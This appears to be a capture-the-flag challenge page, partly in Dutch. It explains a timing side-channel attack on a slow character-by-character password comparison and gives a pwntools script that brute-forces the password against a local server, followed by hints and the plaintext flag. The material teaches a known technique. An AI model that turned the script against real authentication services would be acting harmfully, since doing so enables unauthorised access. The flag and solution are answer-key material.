1.4 KiB
1.4 KiB
Difficulty
85/100 tbh wss is 100/100 beter, ma ik wil het da nie geven cuz ik wil nie degene zijn da zegt MIJN CHALLENGE IS DE MOEILIJKSTE dus ja we zullen zien na testing
Category
Misc
How To Solve
This is a timing comparison attack challenge. The password is compared really slowly and by timing the duration of the answer, you can smart bruteforce the password.
The duration of the comparison of one character is 0.1. This can be timed by sending the alphabet letter by letter to the server and timing the responses. The letter "s" would take longer to send back because it is the first letter of the password.
Here is a solution script:
from pwn import *
def find(password, prevtime):
for c in string.ascii_lowercase:
new_pass = password + c
print(new_pass)
conn = remote("localhost", 3002)
conn.recv()
t = time.time()
conn.send((new_pass + "\n").encode())
ans = conn.recvline(timeout=prevtime + 1)
endtime = time.time() - t
print(endtime)
if endtime - prevtime > 0.08:
conn.close()
find(new_pass, endtime)
break
conn.close()
find("", 0)
Hints
- I hope you payed attention to the course automata and computability!
- It might be useful information that my friend is German.
Flag
IGCTF{THANKYOUALANTURINGITCOULDNOTHAVEBEENEASY}